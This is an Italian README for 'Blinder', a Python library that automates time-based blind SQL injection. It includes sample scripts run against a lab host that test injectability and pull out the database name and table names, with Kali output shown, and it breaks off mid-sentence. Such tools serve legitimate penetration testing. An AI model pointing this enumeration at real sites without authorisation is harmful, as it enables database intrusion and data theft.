
Una libreria Python per automatizzare l'iniezione SQL cieca basata sul tempo.
Blidner è una piccola libreria Python per automatizzare l'iniezione SQL basata sul tempo utilizzando query predefinite come funzioni per accelerare lo sviluppo di PoC.
Puoi installare Blinder usando il seguente comando:
pip install blinder
Oppure scaricando il sorgente e importandolo manualmente nel tuo progetto.
Per usare Blinder devi importare il modulo Blinder e poi iniziare a utilizzare le funzioni principali di Blinder.
Puoi usare Blinder (con la versione corrente) per fare quanto segue:
Puoi verificare l'iniezione in un URL usando il seguente codice:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
Il risultato dell'esecuzione sarà:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Puoi ottenere il nome del database usando il seguente codice:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
E i risultati saranno:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
Per ottenere i nomi delle tabelle puoi usare il seguente codice:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
E i risultati saranno:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
Molte funzionalità dovrebbero essere aggiunte presto, come: